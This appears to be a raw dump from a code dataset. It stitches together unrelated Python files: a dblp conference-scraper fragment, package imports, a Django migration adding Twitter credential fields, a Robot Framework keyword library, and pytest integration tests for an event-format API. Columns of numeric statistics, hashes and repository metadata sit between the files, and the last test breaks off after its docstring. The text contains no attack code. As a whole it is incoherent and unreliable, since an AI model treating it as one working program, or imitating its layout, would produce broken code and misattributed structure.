'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2016.bht%3A&h=1000&format=json'
],
'ICCV': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/iccv/iccv2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/iccv/iccv2017.bht%3A&h=1000&format=json'
],
'ECCV': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-3.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-4.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-5.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-6.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-7.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-8.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-9.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-10.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-11.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-12.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-13.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-14.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-15.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-16.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-17.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-18.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-19.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-20.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-21.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-22.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-23.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-24.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-25.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-26.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-27.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-28.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-29.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-30.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-3.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-4.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-5.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-6.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-7.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-8.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-9.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-10.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-11.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-12.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-13.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-14.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-15.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-16.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-3.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-4.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-5.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-6.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-7.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-8.bht%3A&h=1000&format=json'
],
'FAT': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/fat/fat2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/fat/fat2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/fat/fat2020.bht%3A&h=1000&format=json'
]
}
def normalize_word(s):
stemmer = nltk.stem.SnowballStemmer('english')
s = re.sub('\W+', '', s)
s = s.lower()
s = stemmer.stem(s)
return s
def title_match(title, keywords):
title_list = [normalize_word(e.strip()) for e in title.split(' ')]
for keyword in keywords:
if normalize_word(keyword) in title_list:
return True
return False
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--conf', type=str)
args = parser.parse_args()
conf = args.conf
link_list = links[conf]
for i, conf_link in enumerate(link_list):
print("Start:", conf_link)
paper_dict = web_utils.d = web_utils.get_dblp_venue(conf_link)
p = Path('./dump', conf)
p.mkdir(exist_ok=True, parents=True)
with open(str(Path(p, str(i) + '.yaml')), 'w') as f:
yaml.safe_dump(paper_dict, f)
if __name__ == "__main__":
main()
| 75.003145
| 103
| 0.678462
| 4,223
| 23,851
| 3.824769
| 0.073644
| 0.123143
| 0.16419
| 0.246285
| 0.874133
| 0.874133
| 0.859274
| 0.856674
| 0.856674
| 0.856674
| 0
| 0.104299
| 0.104775
| 23,851
| 317
| 104
| 75.239748
| 0.652164
| 0
| 0
| 0.043333
| 0
| 0.736667
| 0.82986
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01
| false
| 0
| 0.026667
| 0
| 0.046667
| 0.006667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4c19d90999ea2df3cec03fb6619c504e05deab5c
| 133
|
py
|
Python
|
jai_benchmark/tools/__init__.py
|
LaudateCorpus1/edgeai-benchmark
|
bc7f3c52862133f5fe8409248c21887b3f930a68
|
[
"BSD-3-Clause"
] | 7
|
2021-07-31T16:41:57.000Z
|
2022-03-30T23:29:12.000Z
|
jai_benchmark/tools/__init__.py
|
LaudateCorpus1/edgeai-benchmark
|
bc7f3c52862133f5fe8409248c21887b3f930a68
|
[
"BSD-3-Clause"
] | 3
|
2022-02-09T17:39:02.000Z
|
2022-03-30T07:07:06.000Z
|
jai_benchmark/tools/__init__.py
|
LaudateCorpus1/edgeai-benchmark
|
bc7f3c52862133f5fe8409248c21887b3f930a68
|
[
"BSD-3-Clause"
] | 3
|
2021-11-15T01:44:32.000Z
|
2022-01-20T05:19:27.000Z
|
from .run_accuracy import *
from .run_report import *
from .run_package import *
from .run_model import *
from .get_configs import *
| 22.166667
| 27
| 0.774436
| 20
| 133
| 4.9
| 0.45
| 0.285714
| 0.397959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150376
| 133
| 5
| 28
| 26.6
| 0.867257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9112bd880035ebd0c6fb59ad3d518d265d16b123
| 993
|
py
|
Python
|
chirp/migrations/0032_alter_user_twitter_credentials.py
|
kingsdigitallab/tap-django
|
5a7c48cc6ae5134b6e6435b459cf1c00761f2895
|
[
"MIT"
] | null | null | null |
chirp/migrations/0032_alter_user_twitter_credentials.py
|
kingsdigitallab/tap-django
|
5a7c48cc6ae5134b6e6435b459cf1c00761f2895
|
[
"MIT"
] | null | null | null |
chirp/migrations/0032_alter_user_twitter_credentials.py
|
kingsdigitallab/tap-django
|
5a7c48cc6ae5134b6e6435b459cf1c00761f2895
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.6 on 2018-06-20 12:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('chirp', '0031_alter_field_active_on_filter'),
]
operations = [
migrations.AlterField(
model_name='user',
name='twitter_access_token',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='user',
name='twitter_access_token_secret',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='user',
name='twitter_api_key',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AlterField(
model_name='user',
name='twitter_api_secret',
field=models.CharField(blank=True, max_length=64, null=True),
),
]
| 29.205882
| 73
| 0.593152
| 108
| 993
| 5.25
| 0.407407
| 0.141093
| 0.176367
| 0.204586
| 0.719577
| 0.719577
| 0.719577
| 0.719577
| 0.719577
| 0.603175
| 0
| 0.038407
| 0.292044
| 993
| 33
| 74
| 30.090909
| 0.768137
| 0.045317
| 0
| 0.592593
| 1
| 0
| 0.141649
| 0.063425
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
913a6533319f7182fd37937fd1d1976eea7b45fc
| 46
|
py
|
Python
|
NiLBS/pose/__init__.py
|
joemarch010/NILBS
|
c6568818ec8acdb0fe4bd8d197278f0abb361d0b
|
[
"MIT"
] | 2
|
2021-04-01T07:55:11.000Z
|
2021-12-10T02:57:59.000Z
|
NiLBS/pose/__init__.py
|
joemarch010/NILBS
|
c6568818ec8acdb0fe4bd8d197278f0abb361d0b
|
[
"MIT"
] | null | null | null |
NiLBS/pose/__init__.py
|
joemarch010/NILBS
|
c6568818ec8acdb0fe4bd8d197278f0abb361d0b
|
[
"MIT"
] | null | null | null |
import NiLBS.pose.pose
import NiLBS.pose.util
| 15.333333
| 22
| 0.826087
| 8
| 46
| 4.75
| 0.5
| 0.578947
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 3
| 23
| 15.333333
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e678d83bd54fac0f47348d1ae0c1b594584541d7
| 206
|
py
|
Python
|
atest/testdata/keywords/Annotations.py
|
phil-davis/robotframework
|
4d4ce686cbe01e293bb86ea6ff34330e8c45fc43
|
[
"ECL-2.0",
"Apache-2.0"
] | 9
|
2020-04-22T08:30:52.000Z
|
2020-12-07T08:25:09.000Z
|
atest/testdata/keywords/Annotations.py
|
phil-davis/robotframework
|
4d4ce686cbe01e293bb86ea6ff34330e8c45fc43
|
[
"ECL-2.0",
"Apache-2.0"
] | 63
|
2020-03-04T17:31:39.000Z
|
2022-03-01T09:12:16.000Z
|
atest/testdata/keywords/Annotations.py
|
phil-davis/robotframework
|
4d4ce686cbe01e293bb86ea6ff34330e8c45fc43
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2016-02-29T15:42:22.000Z
|
2018-05-08T08:58:18.000Z
|
def annotations(arg1, arg2: str):
return ' '.join(['annotations:', arg1, arg2])
def annotations_with_defaults(arg1, arg2: 'has a default' = 'default'):
return ' '.join(['annotations:', arg1, arg2])
| 34.333333
| 71
| 0.665049
| 25
| 206
| 5.4
| 0.48
| 0.237037
| 0.422222
| 0.37037
| 0.42963
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.145631
| 206
| 5
| 72
| 41.2
| 0.721591
| 0
| 0
| 0.5
| 0
| 0
| 0.223301
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
e68932926ea1844b1107dbfceba533de2e7d302a
| 48
|
py
|
Python
|
dbrlint/src/dbrlint/linter.py
|
wjohnson/AzureDatabricks
|
06882df364fba7e51bf83e561bf46670aff1858a
|
[
"MIT"
] | null | null | null |
dbrlint/src/dbrlint/linter.py
|
wjohnson/AzureDatabricks
|
06882df364fba7e51bf83e561bf46670aff1858a
|
[
"MIT"
] | null | null | null |
dbrlint/src/dbrlint/linter.py
|
wjohnson/AzureDatabricks
|
06882df364fba7e51bf83e561bf46670aff1858a
|
[
"MIT"
] | null | null | null |
from abc import ABC
class Linter(ABC):
pass
| 12
| 19
| 0.708333
| 8
| 48
| 4.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.229167
| 48
| 4
| 20
| 12
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
fc0be4ebbd648adc537b0cf456363d84a4543a24
| 23,636
|
py
|
Python
|
tests/integration/test_event_format.py
|
langrenn-sprint/event-service
|
6ebaffdbd118a7a4ebce0994af22b9ef04a0cb8d
|
[
"Apache-2.0"
] | 1
|
2021-09-12T20:41:02.000Z
|
2021-09-12T20:41:02.000Z
|
tests/integration/test_event_format.py
|
langrenn-sprint/event-service
|
6ebaffdbd118a7a4ebce0994af22b9ef04a0cb8d
|
[
"Apache-2.0"
] | 49
|
2021-06-14T14:44:29.000Z
|
2022-03-28T18:23:37.000Z
|
tests/integration/test_event_format.py
|
langrenn-sprint/event-service
|
6ebaffdbd118a7a4ebce0994af22b9ef04a0cb8d
|
[
"Apache-2.0"
] | null | null | null |
"""Integration test cases for the event_format route."""
from copy import deepcopy
import os
from typing import Dict
from aiohttp import hdrs
from aiohttp.test_utils import TestClient as _TestClient
from aioresponses import aioresponses
import jwt
from multidict import MultiDict
import pytest
from pytest_mock import MockFixture
@pytest.fixture
def token() -> str:
"""Create a valid token."""
secret = os.getenv("JWT_SECRET")
algorithm = "HS256"
payload = {"identity": os.getenv("ADMIN_USERNAME")}
return jwt.encode(payload, secret, algorithm) # type: ignore
@pytest.fixture
async def event() -> Dict[str, str]:
"""An event object for testing."""
return {
"id": "event_id_1",
"name": "Oslo Skagen sprint",
"competition_format": "Individual sprint",
"date_of_event": "2021-08-31",
"organiser": "Lyn Ski",
"webpage": "https://example.com",
"information": "Testarr for å teste den nye løysinga.",
}
@pytest.fixture
async def new_event_format_interval_start() -> dict:
"""Create a mock event_format object."""
return {
"name": "Interval Start",
"starting_order": "Draw",
"start_procedure": "Interval Start",
"time_between_groups": "00:10:00",
"intervals": "00:00:30",
"max_no_of_contestants_in_raceclass": 9999,
"max_no_of_contestants_in_race": 9999,
"datatype": "interval_start",
}
@pytest.fixture
async def new_event_format_individual_sprint() -> dict:
"""Create a mock event_format object."""
return {
"name": "Individual Sprint",
"starting_order": "Draw",
"start_procedure": "Interval Start",
"time_between_groups": "00:10:00",
"time_between_rounds": "00:05:00",
"time_between_heats": "00:02:30",
"max_no_of_contestants_in_raceclass": 80,
"max_no_of_contestants_in_race": 10,
"datatype": "individual_sprint",
}
@pytest.fixture
async def event_format_interval_start() -> dict:
"""Create a mock event_format object."""
return {
"name": "Interval Start",
"starting_order": "Draw",
"start_procedure": "Interval Start",
"time_between_groups": "00:10:00",
"intervals": "00:00:30",
"max_no_of_contestants_in_raceclass": 9999,
"max_no_of_contestants_in_race": 9999,
"datatype": "interval_start",
}
@pytest.fixture
async def event_format_individual_sprint() -> dict:
"""Create a mock event_format object."""
return {
"name": "Individual Sprint",
"starting_order": "Draw",
"start_procedure": "Interval Start",
"time_between_groups": "00:10:00",
"time_between_rounds": "00:05:00",
"time_between_heats": "00:02:30",
"max_no_of_contestants_in_raceclass": 80,
"max_no_of_contestants_in_race": 10,
"datatype": "individual_sprint",
}
@pytest.mark.integration
async def test_create_event_format_interval_start(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event: dict,
new_event_format_interval_start: dict,
) -> None:
"""Should return Created, location header."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = new_event_format_interval_start
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 201
assert f"/events/{EVENT_ID}/format" in resp.headers[hdrs.LOCATION]
@pytest.mark.integration
async def test_create_event_format_individual_sprint(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event: dict,
new_event_format_individual_sprint: dict,
) -> None:
"""Should return Created, location header."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = new_event_format_individual_sprint
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 201
assert f"/events/{EVENT_ID}/format" in resp.headers[hdrs.LOCATION]
@pytest.mark.integration
async def test_get_event_format_interval_start(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_interval_start: dict,
) -> None:
"""Should return OK, and a body containing one event_format."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_interval_start,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.get(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 200
assert "application/json" in resp.headers[hdrs.CONTENT_TYPE]
body = await resp.json()
assert type(body) is dict
assert body["name"] == event_format_interval_start["name"]
assert body["starting_order"] == event_format_interval_start["starting_order"]
assert body["start_procedure"] == event_format_interval_start["start_procedure"]
assert body["intervals"] == event_format_interval_start["intervals"]
@pytest.mark.integration
async def test_get_event_format_individual_sprint(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_individual_sprint: dict,
) -> None:
"""Should return OK, and a body containing one event_format."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_individual_sprint,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.get(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 200
assert "application/json" in resp.headers[hdrs.CONTENT_TYPE]
body = await resp.json()
assert type(body) is dict
assert body["name"] == event_format_individual_sprint["name"]
assert (
body["starting_order"] == event_format_individual_sprint["starting_order"]
)
assert (
body["start_procedure"] == event_format_individual_sprint["start_procedure"]
)
assert (
body["time_between_heats"]
== event_format_individual_sprint["time_between_heats"]
)
assert (
body["time_between_rounds"]
== event_format_individual_sprint["time_between_rounds"]
)
assert (
body["max_no_of_contestants_in_raceclass"]
== event_format_individual_sprint["max_no_of_contestants_in_raceclass"]
)
assert (
body["max_no_of_contestants_in_race"]
== event_format_individual_sprint["max_no_of_contestants_in_race"]
)
@pytest.mark.integration
async def test_update_event_format_interval_start(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_interval_start: dict,
) -> None:
"""Should return No Content."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format", # noqa: B950
return_value=event_format_interval_start,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
request_body = deepcopy(event_format_interval_start)
request_body["starting_order"] = "Manual Draw"
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 204
@pytest.mark.integration
async def test_update_event_format_individual_sprint(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_individual_sprint: dict,
) -> None:
"""Should return No Content."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format", # noqa: B950
return_value=event_format_individual_sprint,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
request_body = deepcopy(event_format_individual_sprint)
request_body["starting_order"] = "Manual Draw"
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 204
@pytest.mark.integration
async def test_delete_event_format(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_interval_start: dict,
) -> None:
"""Should return No Content."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format", # noqa: B950
return_value=event_format_interval_start,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.delete_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.delete(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 204
# Bad cases
# Event not found
@pytest.mark.integration
async def test_create_event_format_event_not_found(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
new_event_format_interval_start: dict,
) -> None:
"""Should return 404 Not found."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=None,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = new_event_format_interval_start
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 404
# Mandatory properties missing at create and update:
@pytest.mark.integration
async def test_create_event_format_missing_mandatory_property(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event: dict,
) -> None:
"""Should return 422 HTTPUnprocessableEntity."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = {"id": RACECLASS_ID, "optional_property": "Optional_property"}
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 422
@pytest.mark.integration
async def test_update_event_format_missing_mandatory_property(
client: _TestClient, mocker: MockFixture, token: MockFixture
) -> None:
"""Should return 422 HTTPUnprocessableEntity."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format", # noqa: B950
return_value={"id": RACECLASS_ID, "name": "missing_the_rest_of_the_properties"},
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
request_body = {"id": RACECLASS_ID, "name": "missing_the_rest_of_the_properties"}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 422
@pytest.mark.integration
async def test_create_event_format_adapter_fails(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event: dict,
new_event_format_interval_start: dict,
) -> None:
"""Should return 400 HTTPBadRequest."""
